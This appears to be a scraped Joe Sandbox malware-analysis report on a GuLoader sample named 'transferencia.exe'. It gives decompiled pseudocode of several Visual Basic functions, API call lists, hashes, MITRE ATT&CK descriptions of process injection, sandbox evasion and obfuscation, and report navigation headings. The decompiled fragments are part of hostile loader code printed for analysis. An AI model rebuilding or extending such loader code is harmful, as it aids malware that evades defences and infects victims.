				L004013C2();
				if( *0x412010 != 0) {
					_v80 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v80 = 0x412010;
				}
				_t41 =  &_v32;
				L004013A4();
				_v68 = _t41;
				_t44 =  *((intOrPtr*)( *_v68 + 0x180))(_v68, _t41,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x31c))( *_v80));
				asm("fclex");
				_v72 = _t44;
				if(_v72 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x40d3b4);
					_push(_v68);
					_push(_v72);
					L004013CE();
					_v84 = _t44;
				}
				L00401380();
				_v56 = _a4;
				_v64 = 9;
				L00401368();
				_t46 =  &_v48;
				_push(_t46);
				L0040136E();
				_v68 =  ~(0 | _t46 != 0x0000ffff);
				L004013AA();
				_t47 = _v68;
				if(_t47 != 0) {
					_push(0x6f);
					L00401362();
					_v28 = _t47;
				}
				_push(0x40d3c8);
				L0040135C();
				_push(0x40fc14);
				L004013BC();
				return _t47;
			}

0x0040fae2
0x0040faed
0x0040faee
0x0040faf5
0x0040faf8
0x0040fb00
0x0040fb03
0x0040fb10
0x0040fb1c
0x0040fb36
0x0040fb1e
0x0040fb1e
0x0040fb23
0x0040fb28
0x0040fb2d
0x0040fb2d
0x0040fb51
0x0040fb55
0x0040fb5a
0x0040fb65
0x0040fb6b
0x0040fb6d
0x0040fb74
0x0040fb90
0x0040fb76
0x0040fb76
0x0040fb7b
0x0040fb80
0x0040fb83
0x0040fb86
0x0040fb8b
0x0040fb8b
0x0040fb97
0x0040fb9f
0x0040fba2
0x0040fbaf
0x0040fbb4
0x0040fbb7
0x0040fbb8
0x0040fbc8
0x0040fbcf
0x0040fbd4
0x0040fbda
0x0040fbdc
0x0040fbde
0x0040fbe6
0x0040fbe6
0x0040fbe9
0x0040fbee
0x0040fbf3
0x0040fc0e
0x0040fc13

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040FAF8
__vbaStrCopy.MSVBVM60(?,?,?,?,00401236), ref: 0040FB10
__vbaNew2.MSVBVM60(0040D778,00412010,?,?,?,?,00401236), ref: 0040FB28
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FB55
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D3B4,00000180), ref: 0040FB86
__vbaFreeObj.MSVBVM60(00000000,?,0040D3B4,00000180), ref: 0040FB97
__vbaVarDup.MSVBVM60(00000000,?,0040D3B4,00000180), ref: 0040FBAF
#562.MSVBVM60(?), ref: 0040FBB8
__vbaFreeVar.MSVBVM60(?), ref: 0040FBCF
#571.MSVBVM60(0000006F,?), ref: 0040FBDE
__vbaI4Str.MSVBVM60(0040D3C8,?), ref: 0040FBEE
__vbaFreeStr.MSVBVM60(0040FC14,0040D3C8,?), ref: 0040FC0E

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: __vba$Free$#562#571CheckChkstkCopyHresultNew2
String ID:
API String ID: 4102578244-0
Opcode ID: 4b17e76eb28ad9b6e2484a48a2b81b78ab0dc1a413e75d06b02a3cf4bd4539b4
Instruction ID: a37eea50d1268da8cc45f9911754973015ec78f58b5052622a63b257d79e678e
Opcode Fuzzy Hash: 4b17e76eb28ad9b6e2484a48a2b81b78ab0dc1a413e75d06b02a3cf4bd4539b4
Instruction Fuzzy Hash: 70310970D00209EBDB14EFA5C856BEDBBB4BF08704F10853AE901B75E1D778690ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041073E, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041073E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v68;
				signed int _v72;
				char* _t37;
				signed int _t41;
				void* _t51;
				void* _t53;
				intOrPtr _t54;

				_t54 = _t53 - 0xc;
				 *[fs:0x0] = _t54;
				L00401230();
				_v16 = _t54;
				_v12 = 0x401208;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x401236, _t51);
				if( *0x412010 != 0) {
					_v68 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v68 = 0x412010;
				}
				_t37 =  &_v32;
				L004013A4();
				_v52 = _t37;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L00401230();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t41 =  *((intOrPtr*)( *_v52 + 0x1ec))(_v52, L"Unrational", 0x10, _t37,  *((intOrPtr*)( *((intOrPtr*)( *_v68)) + 0x360))( *_v68));
				asm("fclex");
				_v56 = _t41;
				if(_v56 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x1ec);
					_push(0x40d3a4);
					_push(_v52);
					_push(_v56);
					L004013CE();
					_v72 = _t41;
				}
				L00401380();
				_v28 = 0x6956;
				_push(0x410840);
				return _t41;
			}

0x00410741
0x00410750
0x0041075a
0x00410762
0x00410765
0x0041076c
0x0041077b
0x00410785
0x0041079f
0x00410787
0x00410787
0x0041078c
0x00410791
0x00410796
0x00410796
0x004107ba
0x004107be
0x004107c3
0x004107c6
0x004107cd
0x004107d7
0x004107e1
0x004107e2
0x004107e3
0x004107e4
0x004107f2
0x004107f8
0x004107fa
0x00410801
0x0041081d
0x00410803
0x00410803
0x00410808
0x0041080d
0x00410810
0x00410813
0x00410818
0x00410818
0x00410824
0x00410829
0x0041082f
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0041075A
__vbaNew2.MSVBVM60(0040D778,00412010,?,?,?,?,00401236), ref: 00410791
__vbaObjSet.MSVBVM60(?,00000000), ref: 004107BE
__vbaChkstk.MSVBVM60(?,00000000), ref: 004107D7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D3A4,000001EC), ref: 00410813
__vbaFreeObj.MSVBVM60 ref: 00410824

Strings

Unrational, xrefs: 004107E5
Vi, xrefs: 00410829

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: __vba$Chkstk$CheckFreeHresultNew2
String ID: Unrational$Vi
API String ID: 3189907775-1566267825
Opcode ID: e75d373a121de8e883af3c4ada76f6ada6adf509359e52ec9a5544f72191e070
Instruction ID: b4d99efaec68f226abf49acbb2eea8ecab6d7a40082a672d23727e898705fd5c
Opcode Fuzzy Hash: e75d373a121de8e883af3c4ada76f6ada6adf509359e52ec9a5544f72191e070
Instruction Fuzzy Hash: 4021FB70E10208EFCB10EF94C945BDEBBB5BF09704F20446AF905BB2A1C7B95945DB99

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report transferencia

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: transferencia.exe PID: 6424 Parent PID: 5996

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: transferencia.exe PID: 6424 Parent PID: 5996 transferencia.exeCOMMON

Execution Graph

Function 00403D8D, Relevance: 2.8, APIs: 1, Instructions: 1595
COMMONCrypto

Function 004040BF, Relevance: 2.4, APIs: 1, Instructions: 1178
memoryCOMMON

Function 00404139, Relevance: 2.4, APIs: 1, Instructions: 1120
memoryCOMMON

Function 004041B5, Relevance: 2.3, APIs: 1, Instructions: 1070
memoryCOMMON

Function 00404233, Relevance: 2.3, APIs: 1, Instructions: 1038
memoryCOMMON

Function 004043B6, Relevance: 2.2, APIs: 1, Instructions: 973
memoryCOMMON

Function 0040433B, Relevance: 2.2, APIs: 1, Instructions: 969
memoryCOMMON

Function 0040443C, Relevance: 2.2, APIs: 1, Instructions: 912
memoryCOMMON

Function 004044C5, Relevance: 2.1, APIs: 1, Instructions: 867
memoryCOMMON

Function 0040454B, Relevance: 2.1, APIs: 1, Instructions: 864
memoryCOMMON

Function 004045CD, Relevance: 2.1, APIs: 1, Instructions: 803
memoryCOMMON

Function 00404646, Relevance: 2.0, APIs: 1, Instructions: 766
COMMON

Function 004046C1, Relevance: 2.0, APIs: 1, Instructions: 739
memoryCOMMON

Function 004102A2, Relevance: 63.3, APIs: 34, Strings: 2, Instructions: 273
COMMON

Function 0040EE14, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 176
COMMON

Function 004013EC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100
COMMON

Function 00404D5A, Relevance: 1.6, APIs: 1, Instructions: 301
memoryCOMMON

Function 00404E05, Relevance: 1.5, APIs: 1, Instructions: 232
memoryCOMMON

Function 00404E03, Relevance: 1.5, APIs: 1, Instructions: 227
memoryCOMMON

Function 00404DDB, Relevance: 1.5, APIs: 1, Instructions: 227
memoryCOMMON

Function 00404DEF, Relevance: 1.5, APIs: 1, Instructions: 227
memoryCOMMON

Function 00404E07, Relevance: 1.5, APIs: 1, Instructions: 226
memoryCOMMON

Function 00404E09, Relevance: 1.5, APIs: 1, Instructions: 225
memoryCOMMON

Function 00404DF1, Relevance: 1.5, APIs: 1, Instructions: 225
memoryCOMMON

Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 225
memoryCOMMON

Function 00404DF5, Relevance: 1.5, APIs: 1, Instructions: 224
memoryCOMMON